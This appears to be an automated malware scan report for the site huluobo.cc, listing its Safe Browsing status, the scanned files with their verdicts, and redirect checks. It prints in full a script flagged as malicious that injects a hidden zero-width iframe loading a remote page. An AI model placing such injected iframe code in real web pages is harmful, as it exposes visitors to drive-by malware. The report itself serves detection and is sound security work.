Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=huluobo.cc
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.huluobo.cc/ | HTTP/1.1 200 OK Connection: close Date: Sun, 21 Dec 2014 20:28:33 GMT Accept-Ranges: bytes ETag: "2a94a3ad5b1dd01:ac4" Vary: Accept-Encoding Content-Length: 70473 Content-Location: http://www.huluobo.cc/index.htm Content-Type: text/html Last-Modified: Sun, 21 Dec 2014 20:21:18 GMT Set-Cookie: __jsluid=1a1f9931b0f5868335efc2c1f910cf83; path=/ X-Cache: pass | clean |
http://www.huluobo.cc/index.htm | 200 OK Content-Length: 70473 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.7mys.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Ó°ÒôÏÈ·æÄ㶮µÄ_Ó°ÒôÏÈ·æµ¼º½_¼ª¼ªµçÓ°´óÈ«_Ä㶮µÃµçÓ°Íø</TITLE> <meta name="copyright" content="µçÓ°µ¼º½www.huluobo.cc"> <meta name="description" content="µçÓ°ÍøÖ·µ¼º½Ìṩ¿ì²¥µçÓ°ÍøÕ¾b¿ì²¥×ÊÔ´ÏÂÔØ,È˹¤É¸Ñ¡,ÂÌÉ«ÎÞ¶ ...[4595 bytes skipped]... | ||
http://www.huluobo.cc/come.js | 200 OK Content-Length: 79 Content-Type: application/x-javascript | clean |
http://www.999dydh.com/IP/200x60.js | 200 OK Content-Length: 258 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.writeln("<iframe align=middle src=\"http://www.999dydh.com/IP/200x60.asp\" frameborder=0 width=200 scrolling=no height=60></iframe><iframe align=middle src=\"http://www.999dydh.com/IP/ip.asp\" frameborder=0 width=0 scrolling=no height=0></iframe>"); Antivirus reports:
| ||
http://www.huluobo.cc//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 4379 Content-Type: text/html | clean |
http://www.huluobo.cc/test404page.js | 404 Not Found Content-Length: 4379 Content-Type: text/html | clean |
http://js.users.51.la/5446034.js | 200 OK Content-Length: 1944 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: huluobo.cc
Result:
GET / HTTP/1.1
Host: huluobo.cc
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: huluobo.cc
Referer: http://www.google.com/search?q=huluobo.cc
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: huluobo.cc
Referer: http://www.google.com/search?q=huluobo.cc
Result:
The result is similar to the first query. There are no suspicious redirects found.